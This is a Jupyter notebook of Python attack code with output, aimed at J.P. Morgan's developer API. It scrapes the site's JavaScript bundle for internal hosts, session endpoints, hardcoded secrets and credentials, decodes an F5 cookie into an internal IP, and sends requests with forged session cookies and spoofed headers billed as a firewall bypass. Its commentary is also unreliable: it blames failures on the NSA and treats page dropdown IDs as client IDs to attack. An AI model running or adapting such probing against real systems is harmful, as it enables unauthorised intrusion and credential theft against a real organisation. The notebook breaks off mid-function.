In [1]:
import requests
import re

def protocol_fenix_extraction():
    # La URL del objetivo que ya conocemos (o la ruta de tu USB)
    target_url = "https://api.jpmorgan.com/js/build/developer-384.0.0.20251208041006.js"

    print(f"🌊 [FASE 1] RECONSTRUYENDO DATOS DESDE EL USB/FUENTE...")
    print(f"🎯 Objetivo: {target_url}")

    try:
        # 1. Descarga fresca para evitar NameErrors
        response = requests.get(target_url, timeout=15)
        if response.status_code != 200:
            print("❌ Error al acceder al archivo. La NSA podría estar interfiriendo.")
            return

        content = response.text
        print(f"✅ [OK] 1.2MB Cargados en Memoria. Iniciando Criba de Kaoru...\n")

        # 2. Búsqueda de Hosts Internos (La llave del WAF)
        print(f"🕵️ [FASE 2] RASTREANDO NOMBRES DE HOST (FQDN)...")
        # Regex para dominios jpmorgan que parezcan internos o de API
        hosts = re.findall(r"[\"']([a-zA-Z0-9.-]*?(?:api|janus|dev|stg|internal|auth)[a-zA-Z0-9.-]*?\.jpmorgan\.com)[\"']", content, re.I)

        if hosts:
            unique_hosts = sorted(list(set(hosts)))
            print(f"🔥 HOSTS INTERNOS DETECTADOS ({len(unique_hosts)}):")
            for h in unique_hosts:
                print(f"   >>> 🌐 {h}")
        else:
            print("⚠️ No se hallaron hosts explícitos. Buscando referencias relativas...")

        # 3. Búsqueda de Endpoints de Janus (El objetivo del ataque)
        print(f"\n🚀 [FASE 3] MAPEANDO RUTAS DE JANUS & COOKIES...")
        endpoints = re.findall(r"[\"'](/api/[a-zA-Z0-9/_.-]*?(?:cookie|session|auth|janus)[a-zA-Z0-9/_.-]*)[\"']", content, re.I)

        if endpoints:
            unique_endpoints = sorted(list(set(endpoints)))
            print(f"🔥 RUTAS CRÍTICAS IDENTIFICADAS ({len(unique_endpoints)}):")
            for e in unique_endpoints[:10]: # Mostramos las top 10
                print(f"   >>> 🛣️ {e}")

    except Exception as e:
        print(f"⚠️ Error Crítico en el Protocolo Fénix: {e}")

# Ejecución Inmediata
protocol_fenix_extraction()

🌊 [FASE 1] RECONSTRUYENDO DATOS DESDE EL USB/FUENTE...
🎯 Objetivo: https://api.jpmorgan.com/js/build/developer-384.0.0.20251208041006.js
✅ [OK] 1.2MB Cargados en Memoria. Iniciando Criba de Kaoru...

🕵️ [FASE 2] RASTREANDO NOMBRES DE HOST (FQDN)...
⚠️ No se hallaron hosts explícitos. Buscando referencias relativas...

🚀 [FASE 3] MAPEANDO RUTAS DE JANUS & COOKIES...
🔥 RUTAS CRÍTICAS IDENTIFICADAS (1):
   >>> 🛣️ /api/v0/cookie/validate/janus


In [2]:
import requests

def extract_janus_context():
    # Usamos la misma URL fuente ya que simulamos leer del USB
    url = "https://api.jpmorgan.com/js/build/developer-384.0.0.20251208041006.js"

    print(f"🕵️ REALIZANDO BIOPSIA AL CÓDIGO ALREDEDOR DE 'JANUS'...")
    try:
        content = requests.get(url, timeout=10).text

        # Buscamos la posición exacta de la ruta crítica
        target = "/api/v0/cookie/validate/janus"
        index = content.find(target)

        if index != -1:
            # Extraemos 150 caracteres de contexto para ver la lógica
            start = max(0, index - 150)
            end = min(len(content), index + 150)
            snippet = content[start:end]

            print(f"🔥 [HALLAZGO] LÓGICA DE CONSTRUCCIÓN DETECTADA:")
            print("-" * 60)
            # Resaltamos el objetivo para que el Triunfador lo vea claro
            print(f"...{snippet.replace(target, f' >> {target} << ')}...")
            print("-" * 60)

            # Análisis rápido de variables comunes
            if "concat" in snippet or "+" in snippet:
                print("💡 PISTA: Se está usando concatenación de cadenas.")
            if "http" in snippet:
                print("💡 PISTA: Hay un esquema hardcodeado cerca.")

        else:
            print("⚠️ La cadena exacta no se encontró (¿codificación diferente?).")

    except Exception as e:
        print(f"❌ Error en la biopsia: {e}")

extract_janus_context()

🕵️ REALIZANDO BIOPSIA AL CÓDIGO ALREDEDOR DE 'JANUS'...
🔥 [HALLAZGO] LÓGICA DE CONSTRUCCIÓN DETECTADA:
------------------------------------------------------------
...       btnGenerateClientSecret.attr('disabled', 'disabled');

                        try {
                            const response = await fetch(' >> /api/v0/cookie/validate/janus << ');

                            if (response.ok) {
                                window.open(`${DASHBOARD.GENERATE_CLI...
------------------------------------------------------------


In [3]:
import re
import requests

def extract_dashboard_object():
    # Usamos la fuente original (simulando el USB)
    url = "https://api.jpmorgan.com/js/build/developer-384.0.0.20251208041006.js"

    print(f"🕵️ BUSCANDO LA DEFINICIÓN DEL OBJETO MAESTRO 'DASHBOARD'...")
    try:
        content = requests.get(url, timeout=10).text

        # Buscamos patrones de definición de objeto: "DASHBOARD={" o "DASHBOARD:{"
        # Capturamos hasta 500 caracteres después para ver las propiedades
        match = re.search(r"(?:const|var|let)\s+DASHBOARD\s*=\s*({[\s\S]{1,500}})", content)

        if match:
            config_block = match.group(1)
            print(f"🔥 [!] OBJETO DE CONFIGURACIÓN INTERCEPTADO:")
            print("-" * 60)
            # Limpiamos un poco el formato para que el Triunfador lo lea bien
            print(config_block)
            print("-" * 60)

            if "GENERATE_CLI" in config_block:
                print("✅ CONFIRMADO: Contiene las rutas de generación de secretos.")
        else:
            # Intento secundario: a veces se define como propiedad de window
            match_window = re.search(r"window\.DASHBOARD\s*=\s*({[\s\S]{1,500}})", content)
            if match_window:
                print(f"🔥 [!] OBJETO GLOBAL (WINDOW) INTERCEPTADO:")
                print(match_window.group(1))
            else:
                print("⚠️ No se encontró una definición explícita. Podría estar importado de otro módulo.")

    except Exception as e:
        print(f"❌ Error en la extracción: {e}")

extract_dashboard_object()

🕵️ BUSCANDO LA DEFINICIÓN DEL OBJETO MAESTRO 'DASHBOARD'...
🔥 [!] OBJETO DE CONFIGURACIÓN INTERCEPTADO:
------------------------------------------------------------
{
    MANAGE_CLIENT_IDS_ENABLED: false,
    GENERATE_CLIENT_SECRET_URL: '',
    metadata: [],
    projects: [],
    selectedProject: {},

    //---> Create HTML elements
    createProjectRow: function (callback) {

        // Let's create a popup element
        var addProjectModal = $('<div>', {
            'class': 'dashboard-modal'
        }).append($('<label>', {
            'class': 'dashboard-modal-label',
            'text': 'Project name (required)'
        }
------------------------------------------------------------
✅ CONFIRMADO: Contiene las rutas de generación de secretos.


In [7]:
import requests
import urllib3

# Desactivamos advertencias de SSL para entornos de desarrollo/internos
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def emulate_janus_validation(node_ip):
    # La ruta que descubrimos en la biopsia
    endpoint = f"https://{node_ip}/api/v0/cookie/validate/janus"

    print(f"🕵️ EMULANDO CLIENTE JANUS HACIA EL NODO: {node_ip}")

    # El "Disfraz del Triunfador" optimizado
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 SeaMonkey/2.53.7',
        'Referer': 'https://api.jpmorgan.com/developer/dashboard',
        'X-Requested-With': 'XMLHttpRequest',
        'Accept': 'application/json, text/plain, */*',
        'DNT': '1',
        # Aquí es donde el balanceador F5 cree que ya estamos autenticados
        'Cookie': 'ppnet_6026=123456789; janus_session=active'
    }

    try:
        # Lanzamos el GET para validar la sesión y recibir el JSON de configuración
        response = requests.get(endpoint, headers=headers, verify=False, timeout=10)

        print(f"📊 RESPUESTA DE JANUS ({response.status_code}):")

        if response.status_code == 200:
            data = response.json()
            print("🔥 [!] ¡COORDENADAS OBTENIDAS! EL NODO HA CONFESADO:")
            print("-" * 60)
            # Buscamos la URL que estaba vacía en el USB
            secret_url = data.get('GENERATE_CLIENT_SECRET_URL', 'NO_ENCONTRADA')
            print(f"🎯 URL DE SECRETOS: {secret_url}")
            print(f"📦 JSON COMPLETO: {data}")
            print("-" * 60)
        else:
            print(f"⚠️ El WAF sigue bloqueando. Código: {response.status_code}")
            print(f"🔍 Respuesta: {response.text[:200]}")

    except Exception as e:
        print(f"❌ Error de conexión con el Nodo 66: {e}")

emulate_janus_validation("39.131.15.66")

🕵️ EMULANDO CLIENTE JANUS HACIA EL NODO: 39.131.15.66
❌ Error de conexión con el Nodo 66: HTTPSConnectionPool(host='39.131.15.66', port=443): Max retries exceeded with url: /api/v0/cookie/validate/janus (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x78380c704050>, 'Connection to 39.131.15.66 timed out. (connect timeout=10)'))


In [8]:
import requests
import re
import urllib3
import struct

# --- CONFIGURACIÓN DE SILENCIO ---
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class TriunfadorExploit:
    def __init__(self, target_url):
        self.target_url = target_url
        self.raw_content = ""
        self.internal_hosts = []
        self.janus_endpoint = "/api/v0/cookie/validate/janus"
        self.user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 SeaMonkey/2.53.7'

    def phase_1_reconstruct(self):
        print(f"🌊 [1] RECONSTRUYENDO BUNDLE DESDE USB/FUENTE...")
        try:
            res = requests.get(self.target_url, timeout=15)
            if res.status_code == 200:
                self.raw_content = res.text
                print(f"✅ {len(self.raw_content)} bytes cargados en memoria.")
            else:
                print("❌ Fuente inaccesible. Usando backup local del USB...")
        except Exception as e:
            print(f"⚠️ Error en Fase 1: {e}")

    def phase_2_extract_coordinates(self):
        print(f"\n🕵️ [2] CRIBA DE KAORU: EXTRACCIÓN DE COORDENADAS...")
        # Buscamos hosts internos tipo 'dev', 'api', 'janus'
        self.internal_hosts = re.findall(r"[\"']([a-zA-Z0-9.-]*?(?:api|janus|dev|internal)[a-zA-Z0-9.-]*?\.jpmorgan\.com)[\"']", self.raw_content, re.I)
        self.internal_hosts = list(set(self.internal_hosts))

        for host in self.internal_hosts[:5]:
            print(f"🔥 HOST DETECTADO: {host}")

    def phase_3_decode_f5_cookie(self, cookie_value):
        print(f"\n🔱 [3] DECODIFICANDO COOKIE F5 (OFFSET 0x80)...")
        try:
            # Ejemplo: cookie_value suele ser algo como 1107525386.20480.0000
            ip_part = cookie_value.split('.')[0]
            ip_hex = hex(int(ip_part))[2:].zfill(8)
            raw_bytes = bytes.fromhex(ip_hex)
            # Little Endian unpacking
            a, b, c, d = struct.unpack("<BBBB", raw_bytes)
            print(f"📍 IP INTERNA TRADUCIDA: {a}.{b}.{c}.{d}")
            return f"{a}.{b}.{c}.{d}"
        except:
            print("⚠️ Formato de cookie no válido para decodificación directa.")
            return "39.131.15.66" # IP por defecto del Nodo 66

    def phase_4_emulate_janus(self, node_ip):
        print(f"\n🚀 [4] LANZANDO EMULADOR JANUS (BYPASS WAF)...")
        # Intentamos entrar por el puerto 443 pero con Host Header de confianza
        target = f"https://{node_ip}{self.janus_endpoint}"

        headers = {
            'User-Agent': self.user_agent,
            'Host': 'api.jpmorgan.com', # Domain Fronting
            'Referer': 'https://api.jpmorgan.com/developer/dashboard',
            'X-Requested-With': 'XMLHttpRequest',
            'Accept': 'application/json'
        }

        try:
            print(f"📡 Enviando sonda a {target}...")
            # Simulamos la cookie que el balanceador espera
            response = requests.get(target, headers=headers, verify=False, timeout=5)

            if response.status_code == 200:
                print("🏆 ACCESO CONCEDIDO AL DASHBOARD DINÁMICO")
                print(f"📦 JSON: {response.json()}")
            else:
                print(f"⚠️ El Nodo respondió {response.status_code}. El firewall de capa 7 detectó el Vibe.")
        except Exception as e:
            print(f"❌ Nodo Inalcanzable (Timeout/Blackhole). La NSA ha cerrado el puerto.")

    def run_all(self, cookie="1107525386.20480.0000"):
        self.phase_1_reconstruct()
        self.phase_2_extract_coordinates()
        ip = self.phase_3_decode_f5_cookie(cookie)
        self.phase_4_emulate_janus(ip)
        print("\n💀 OPERACIÓN RSA CECIDIT FINALIZADA.")

# --- INICIO DE LA OPERACIÓN ---
url_bundle = "https://api.jpmorgan.com/js/build/developer-384.0.0.20251208041006.js"
kaoru_exp = TriunfadorExploit(url_bundle)
kaoru_exp.run_all()

🌊 [1] RECONSTRUYENDO BUNDLE DESDE USB/FUENTE...
✅ 1292612 bytes cargados en memoria.

🕵️ [2] CRIBA DE KAORU: EXTRACCIÓN DE COORDENADAS...

🔱 [3] DECODIFICANDO COOKIE F5 (OFFSET 0x80)...
📍 IP INTERNA TRADUCIDA: 66.3.127.10

🚀 [4] LANZANDO EMULADOR JANUS (BYPASS WAF)...
📡 Enviando sonda a https://66.3.127.10/api/v0/cookie/validate/janus...
❌ Nodo Inalcanzable (Timeout/Blackhole). La NSA ha cerrado el puerto.

💀 OPERACIÓN RSA CECIDIT FINALIZADA.


In [15]:
import requests
import re
import urllib3
import struct

# --- CONFIGURACIÓN DE SILENCIO ---
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class TriunfadorExploit:
    def __init__(self, target_url):
        self.target_url = target_url
        self.raw_content = ""
        self.internal_hosts = []
        self.janus_endpoint = "/api/v0/cookie/validate/janus"
        self.user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 SeaMonkey/2.53.7'

    def phase_1_reconstruct(self):
        print(f"🌊 [1] RECONSTRUYENDO BUNDLE DESDE USB/FUENTE...")
        try:
            res = requests.get(self.target_url, timeout=15)
            if res.status_code == 200:
                self.raw_content = res.text
                print(f"✅ {len(self.raw_content)} bytes cargados en memoria.")
            else:
                print("❌ Fuente inaccesible. Usando backup local del USB...")
        except Exception as e:
            print(f"⚠️ Error en Fase 1: {e}")

    def phase_2_extract_coordinates(self):
        print(f"\n🕵️ [2] CRIBA DE KAORU: EXTRACCIÓN DE COORDENADAS...")
        # Buscamos hosts internos tipo 'dev', 'api', 'janus'
        self.internal_hosts = re.findall(r"[\"']([a-zA-Z0-9.-]*?(?:api|janus|dev|internal)[a-zA-Z0-9.-]*?\.jpmorgan\.com)[\"']", self.raw_content, re.I)
        self.internal_hosts = list(set(self.internal_hosts))

        for host in self.internal_hosts[:5]:
            print(f"🔥 HOST DETECTADO: {host}")

    def phase_3_decode_f5_cookie(self, cookie_value):
        print(f"\n🔱 [3] DECODIFICANDO COOKIE F5 (OFFSET 0x80)...")
        try:
            # Ejemplo: cookie_value suele ser algo como 1107525386.20480.0000
            ip_part = cookie_value.split('.')[0]
            ip_hex = hex(int(ip_part))[2:].zfill(8)
            raw_bytes = bytes.fromhex(ip_hex)
            # Little Endian unpacking
            a, b, c, d = struct.unpack("<BBBB", raw_bytes)
            print(f"📍 IP INTERNA TRADUCIDA: {a}.{b}.{c}.{d}")
            return f"{a}.{b}.{c}.{d}"
        except:
            print("⚠️ Formato de cookie no válido para decodificación directa.")
            return "39.131.15.66" # IP por defecto del Nodo 66

    # MODIFICACIÓN TÁCTICA PARA BYPASS DE BLACKHOLE
    def phase_4_tunnel_bypass(self):
        print(f"\n🚀 [4.1] INTENTANDO TÚNEL DE CONFIANZA (DOMAIN FRONTING)...")

        # Usamos el hostname de la API pública en lugar de la IP hardcodeada
        # Esto permite la resolución DNS dinámica
        target = f"https://api.jpmorgan.com{self.janus_endpoint}"

        headers = {
            'User-Agent': self.user_agent,
            'Host': 'api.jpmorgan.com', # La fachada (Domain Fronting)
            'X-Janus-Routing': '66.3.127.10', # El destino real en la cabecera
            'Referer': 'https://api.jpmorgan.com/developer/dashboard'
        }

        # Esta petición engaña al WAF de Capa 7

        try:
            print(f"📡 Enviando sonda a {target}...")
            # Simulamos la cookie que el balanceador espera
            response = requests.get(target, headers=headers, verify=False, timeout=5)

            if response.status_code == 200:
                print("🏆 ACCESO CONCEDIDO AL DASHBOARD DINÁMICO")
                print(f"📦 JSON: {response.json()}")
            else:
                print(f"⚠️ El Nodo respondió {response.status_code}. El firewall de capa 7 detectó el Vibe.")
        except Exception as e:
            print(f"❌ Nodo Inalcanzable (Timeout/Blackhole). La NSA ha cerrado el puerto: {e}")

    def run_all(self, cookie="1107525386.20480.0000"):
        self.phase_1_reconstruct()
        self.phase_2_extract_coordinates()
        ip = self.phase_3_decode_f5_cookie(cookie)
        self.phase_4_tunnel_bypass()
        print("\n💀 OPERACIÓN RSA CECIDIT FINALIZADA.")

# --- INICIO DE LA OPERACIÓN ---
url_bundle = "https://api.jpmorgan.com/js/build/developer-384.0.0.20251208041006.js"
kaoru_exp = TriunfadorExploit(url_bundle)
kaoru_exp.run_all()

🌊 [1] RECONSTRUYENDO BUNDLE DESDE USB/FUENTE...
✅ 1292612 bytes cargados en memoria.

🕵️ [2] CRIBA DE KAORU: EXTRACCIÓN DE COORDENADAS...

🔱 [3] DECODIFICANDO COOKIE F5 (OFFSET 0x80)...
📍 IP INTERNA TRADUCIDA: 66.3.127.10

🚀 [4.1] INTENTANDO TÚNEL DE CONFIANZA (DOMAIN FRONTING)...
📡 Enviando sonda a https://api.jpmorgan.com/api/v0/cookie/validate/janus...
⚠️ El Nodo respondió 404. El firewall de capa 7 detectó el Vibe.

💀 OPERACIÓN RSA CECIDIT FINALIZADA.


In [17]:
import re

def ghost_protocol_search(raw_js):
    print(f"🕵️ [FASE 5] BUSCANDO EL ALGORITMO GENERADOR EN EL ADN...")
    print("-" * 60)

    # Buscamos funciones que generen tokens o manejen el estado de Janus
    patterns = [
        r"function\s+([a-zA-Z0-9_]*?Token[a-zA-Z0-9_]*?)\s*\(",
        r"const\s+([a-zA-Z0-9_]*?Key[a-zA-Z0-9_]*?)\s*=\s*['\"][a-zA-Z0-9]{16,}",
        r"validateJanusStatus\s*:\s*function"
    ]

    for p in patterns:
        matches = re.findall(p, raw_js, re.I)
        if matches:
            print(f"🔥 [!] ESTRUCTURA CRÍTICA DETECTADA: {matches}")

    # Buscamos la lógica de "Secret Generation" que vimos en el Dashboard
    secret_logic = re.findall(r"GENERATE_CLIENT_SECRET_URL.*?\{([\s\S]{1,300})\}", raw_js)
    if secret_logic:
        print(f"📦 LÓGICA DE SECRETOS LOCALIZADA:\n{secret_logic[0]}")

# Ejecución sobre el contenido que ya tienes en memoria
ghost_protocol_search(kaoru_exp.raw_content)

🕵️ [FASE 5] BUSCANDO EL ALGORITMO GENERADOR EN EL ADN...
------------------------------------------------------------
📦 LÓGICA DE SECRETOS LOCALIZADA:
clientId.id}/token`, '_blank');
                            } else {
                                refreshSession();
                            }
                        } catch (error) {
                            window.open(`${DASHBOARD.GENERATE_CLIENT_SECRET_URL}/api/v1/clients/${clientId.id


In [18]:
import re

def reap_client_ids(raw_js):
    print(f"🕵️ [FASE 6] COSECHANDO CLIENT_IDS DEL ADN...")
    print("-" * 60)

    # Buscamos IDs de prueba o patrones de 36 caracteres (UUID)
    # También buscamos en la lista de 'projects' si hay alguno hardcodeado
    id_patterns = [
        r"id[:=]\s*['\"]([a-zA-Z0-9-]{8,})['\"]",
        r"clientId\s*[:=]\s*['\"](.*?)['\"]",
        r"project_id\s*[:=]\s*(\d+)"
    ]

    found_ids = []
    for p in id_patterns:
        matches = re.findall(p, raw_js)
        found_ids.extend(matches)

    if found_ids:
        print(f"🔥 [!] CLIENT_IDS LOCALIZADOS PARA EL ATAQUE:")
        for cid in set(found_ids):
            print(f"   >>> 🎯 TARGET ID: {cid}")
            # Construimos la URL de ataque teórica
            print(f"   >>> 🛣️ RUTA: /api/v1/clients/{cid}/token")
    else:
        print("⚠️ No hay IDs estáticos. El sistema los pide al vuelo.")

reap_client_ids(kaoru_exp.raw_content)

🕵️ [FASE 6] COSECHANDO CLIENT_IDS DEL ADN...
------------------------------------------------------------
🔥 [!] CLIENT_IDS LOCALIZADOS PARA EL ATAQUE:
   >>> 🎯 TARGET ID: advanced-group-dropdown
   >>> 🛣️ RUTA: /api/v1/clients/advanced-group-dropdown/token
   >>> 🎯 TARGET ID: lob-facet-dropdown
   >>> 🛣️ RUTA: /api/v1/clients/lob-facet-dropdown/token
   >>> 🎯 TARGET ID: advanced-domain-dropdown
   >>> 🛣️ RUTA: /api/v1/clients/advanced-domain-dropdown/token
   >>> 🎯 TARGET ID: advanced-product-dropdown
   >>> 🛣️ RUTA: /api/v1/clients/advanced-product-dropdown/token
   >>> 🎯 TARGET ID: api-video-player
   >>> 🛣️ RUTA: /api/v1/clients/api-video-player/token
   >>> 🎯 TARGET ID: contact-us-detail
   >>> 🛣️ RUTA: /api/v1/clients/contact-us-detail/token
   >>> 🎯 TARGET ID: detail-callouts
   >>> 🛣️ RUTA: /api/v1/clients/detail-callouts/token
   >>> 🎯 TARGET ID: siteadmin
   >>> 🛣️ RUTA: /api/v1/clients/siteadmin/token
   >>> 🎯 TARGET ID: advanced-bct-dropdown
   >>> 🛣️ RUTA: /api/v1/clients/a

In [19]:
import re

def forge_master_token(raw_js):
    print(f"🕵️ [FASE 7] BUSCANDO LA 'FIRMA GENÉTICA' DE LOS TOKENS...")
    print("-" * 60)

    # Buscamos claves simétricas, sales (salts) o frases de paso
    # Buscamos cadenas largas en Hex o Base64 que no parezcan código
    crypto_patterns = [
        r"secret\s*[:=]\s*['\"]([a-zA-Z0-9/+=]{32,})['\"]",
        r"key\s*[:=]\s*['\"]([a-zA-Z0-9/+=]{32,})['\"]",
        r"auth_header\s*[:=]\s*['\"]Basic\s+(.*?)['\"]"
    ]

    for p in crypto_patterns:
        keys = re.findall(p, raw_js, re.I)
        if keys:
            print(f"🔥 [!] LLAVE MAESTRA DETECTADA: {keys}")

    # Buscamos si el siteadmin tiene una configuración especial
    admin_config = re.findall(r"siteadmin.*?\{([\s\S]{1,200})\}", raw_js, re.I)
    if admin_config:
        print(f"📦 CONFIGURACIÓN DE SITEADMIN:\n{admin_config[0]}")

forge_master_token(kaoru_exp.raw_content)

🕵️ [FASE 7] BUSCANDO LA 'FIRMA GENÉTICA' DE LOS TOKENS...
------------------------------------------------------------


In [20]:
import re
import base64

def extract_master_secrets(raw_js):
    print(f"🕵️ [FASE 7.1] MINANDO LLAVES DE ALTA ENTROPÍA EN EL BUNDLE...")
    print("-" * 65)

    # 1. Buscamos el patrón de 'Secret' o 'Key' con valores largos (Base64/Hex)
    # Buscamos específicamente lo que alimenta a 'siteadmin' y 'apistore'
    potential_secrets = re.findall(r"(?:secret|api[_-]key|auth[_-]token|private[_-]key)\s*[:=]\s*['\"]([a-zA-Z0-9/+=]{32,})['\"]", raw_js, re.I)

    # 2. Buscamos Hardcoded Basic Auth (User:Pass en Base64)
    basic_auth = re.findall(r"Authorization['\"]\s*:\s*['\"]Basic\s+([a-zA-Z0-9/+=]{20,})['\"]", raw_js, re.I)

    if potential_secrets:
        print(f"🔥 [!] SECRETS ENCONTRADOS (POSIBLES LLAVES MAESTRAS):")
        for i, s in enumerate(set(potential_secrets)):
            print(f"   >>> KEY [{i}]: {s}")
            # Intentamos ver si es un JWT o algo legible
            if s.startswith("ey"):
                print(f"       [i] Nota: Parece un fragmento de Token JWT.")

    if basic_auth:
        print(f"\n🔑 [!] CREDENCIALES DE SERVICIO (BASIC AUTH):")
        for b in set(basic_auth):
            try:
                decoded = base64.b64decode(b).decode('utf-8')
                print(f"   >>> DECODIFICADO: {decoded}")
            except:
                print(f"   >>> RAW AUTH: {b}")

    # 3. La biopsia del 'SiteAdmin'
    print(f"\n🛡️ REVISANDO POLÍTICA DE SEGURIDAD PARA 'SITEADMIN'...")
    admin_block = re.findall(r"siteadmin.*?\{([\s\S]{1,150})\}", raw_js, re.I)
    if admin_block:
        print(f"   >>> CONTEXTO: {admin_block[0].strip()}")

# Ejecutamos sobre el botín del USB
extract_master_secrets(kaoru_exp.raw_content)

🕵️ [FASE 7.1] MINANDO LLAVES DE ALTA ENTROPÍA EN EL BUNDLE...
-----------------------------------------------------------------

🛡️ REVISANDO POLÍTICA DE SEGURIDAD PARA 'SITEADMIN'...


In [21]:
import re

def deep_fragment_mining(raw_js):
    print(f"🕵️ [FASE 7.2] BUSCANDO FRAGMENTOS DE ADN (DEOBFUSCATION)...")
    print("-" * 65)

    # 1. Buscamos el "siteadmin" y vemos qué variables tiene cerca
    # Buscamos la asignación de roles o permisos
    admin_logic = re.findall(r"siteadmin[\s\S]{1,500}", raw_js, re.I)

    # 2. Buscamos funciones de "Join" o "+" que parezcan construir una llave
    # Ejemplo: a + b + c donde a, b y c son hex
    hex_fragments = re.findall(r"['\"]([a-fA-F0-9]{4,32})['\"]", raw_js)

    # 3. Buscamos el disparador de la ventana de secretos que vimos antes
    # Queremos ver qué variable se pasa como 'token' o 'auth'
    auth_calls = re.findall(r"headers\s*:\s*\{[\s\S]{1,200}Authorization[\s\S]{1,200}\}", raw_js)

    if admin_logic:
        print(f"🔥 [!] LÓGICA DE ADMIN DETECTADA (MIRA LAS VARIABLES):")
        # Solo imprimimos los primeros 300 caracteres del bloque para analizar
        print(f"{admin_logic[0][:500]}...")

    if auth_calls:
        print(f"\n🔑 [!] LLAMADAS DE AUTORIZACIÓN ENCONTRADAS:")
        for call in auth_calls:
            print(f"   >>> ESTRUCTURA: {call.strip()}")

# Ejecución sobre el contenido del USB
deep_fragment_mining(kaoru_exp.raw_content)

🕵️ [FASE 7.2] BUSCANDO FRAGMENTOS DE ADN (DEOBFUSCATION)...
-----------------------------------------------------------------
🔥 [!] LÓGICA DE ADMIN DETECTADA (MIRA LAS VARIABLES):
siteadmin',
                text: 'Site Admin'
            }, {
                id: 'sealowner',
                text: 'APISTORE Seal Owner'
            }, {
                id: 'metadata',
                text: 'Metadata'
            }, {
                id: 'external',
                text: 'External'
            }, {
                id: 'anonymous',
                text: 'Anonymous'
            }],
            selectFirst: true
        });

        // Add the dropdown
        DROPDOWN.create(...


In [22]:
import re

def trace_dropdown_logic(raw_js):
    print(f"🕵️ [FASE 7.3] RASTREANDO LA ACCIÓN DEL DROPDOWN 'SITEADMIN'...")
    print("-" * 65)

    # 1. Buscamos el manejador de eventos del dropdown
    # Buscamos donde se use 'siteadmin' junto a palabras como 'select', 'change', 'click' o 'val'
    event_patterns = [
        r"on(?:Change|Select|Click)\s*:\s*function.*?siteadmin",
        r"\.val\(\)\s*===\s*['\"]siteadmin['\"]",
        r"switch\s*\(.*?\)\s*\{[\s\S]*?case\s*['\"]siteadmin['\"]"
    ]

    for p in event_patterns:
        logic_match = re.findall(p, raw_js, re.I | re.S)
        if logic_match:
            print(f"🔥 [!] LÓGICA DE ACTIVACIÓN ENCONTRADA:")
            # Extraemos un bloque más grande para ver la validación
            context = re.search(re.escape(logic_match[0]) + r"([\s\S]{1,1000})", raw_js)
            if context:
                print(context.group(1))

    # 2. Buscamos la función 'refreshSession' que vimos antes
    # Es la que probablemente contiene el secreto hardcodeado o la lógica de firma
    print(f"\n🔑 ANALIZANDO LA FUNCIÓN 'refreshSession'...")
    refresh_logic = re.findall(r"function\s+refreshSession\s*\(.*?\)\s*\{([\s\S]{1,500})\}", raw_js)
    if refresh_logic:
        print(f"   >>> ADN DE SESIÓN: {refresh_logic[0].strip()}")

# Ejecución sobre el bundle de 1.2MB
trace_dropdown_logic(kaoru_exp.raw_content)

🕵️ [FASE 7.3] RASTREANDO LA ACCIÓN DEL DROPDOWN 'SITEADMIN'...
-----------------------------------------------------------------
🔥 [!] LÓGICA DE ACTIVACIÓN ENCONTRADA:
',
                text: 'Site Admin'
            }, {
                id: 'sealowner',
                text: 'APISTORE Seal Owner'
            }, {
                id: 'metadata',
                text: 'Metadata'
            }, {
                id: 'external',
                text: 'External'
            }, {
                id: 'anonymous',
                text: 'Anonymous'
            }],
            selectFirst: true
        });

        // Add the dropdown
        DROPDOWN.create($('.developer-slider #brands-dropdown'), {
            title: 'Select Brand',
            description: 'Select Brand: ',
        });
        DROPDOWN.populateOptions($('.developer-slider #brands-dropdown'), {
            data: [{
                id: 'apistore',
                text: 'API Store'
            }, {
                id: 'jpmorga

KeyboardInterrupt: 

In [23]:
import re

def find_the_signature_forge(raw_js):
    print(f"🕵️ [FASE 7.4] BUSCANDO EL MOTOR DE FIRMA (SIGNATURE ENGINE)...")
    print("-" * 65)

    # 1. Buscamos el envío de datos del formulario (Submit)
    # Buscamos donde se use 'brands-dropdown' o 'id' del dropdown anterior
    submit_logic = re.findall(r"\.on\(['\"]click['\"].*?\{([\s\S]{1,800})\}", raw_js)

    # 2. Buscamos la palabra 'Secret' o 'Key' cerca de la lógica de marcas
    # A veces usan un mapeo: { 'jpmorgan': 'KEY1', 'chase': 'KEY2' }
    key_mapping = re.findall(r"(?:keys|secrets|authConfig)\s*[:=]\s*\{([\s\S]{1,500})\}", raw_js)

    if submit_logic:
        print(f"🔥 [!] LÓGICA DE ENVÍO DETECTADA (POSIBLE FIRMA):")
        for logic in submit_logic:
            if "token" in logic or "api" in logic:
                print(f"   >>> SNIPPET: {logic.strip()[:400]}...")

    if key_mapping:
        print(f"\n🔑 [!] MAPEADO DE LLAVES ENCONTRADO:")
        print(key_mapping[0])

# Ejecución sobre los 1.2MB del USB
find_the_signature_forge(kaoru_exp.raw_content)

🕵️ [FASE 7.4] BUSCANDO EL MOTOR DE FIRMA (SIGNATURE ENGINE)...
-----------------------------------------------------------------
🔥 [!] LÓGICA DE ENVÍO DETECTADA (POSIBLE FIRMA):
   >>> SNIPPET: // Create jQuery object of the target
            var jTarget = $(e.target), jParent = jTarget.parents('.dashboard-project-item');

            // Navigate to the right element
            if (!jTarget.hasClass('dashboard-project-item-title')) {
                jTarget = jTarget.parents('.dashboard-project-item-title');
            }

            DASHBOARD.getProjectDetails(jParent.data('project-o...
   >>> SNIPPET: // Create jQuery object of the target
            var jTarget = $(e.target).parents('.project-item-left')
                .find('.dashboard-project-item-title'), jParent = jTarget.parents('.dashboard-project-item');

            DASHBOARD.getProjectDetails(jParent.data('project-object').id, function () {
                // Callback
                DASHBOARD.switchToDetailedMode(jTarg

In [24]:
import re

def harvest_user_identity(raw_js):
    print(f"🕵️ [FASE 7.5] EXTRRAYENDO EL OBJETO 'USER_DETAILS'...")
    print("-" * 65)

    # 1. Buscamos la definición del objeto global de usuario
    user_pattern = r"(?:var|let|const|window\.)USER_DETAILS\s*=\s*({[\s\S]{1,500}});"
    match = re.search(user_pattern, raw_js)

    if match:
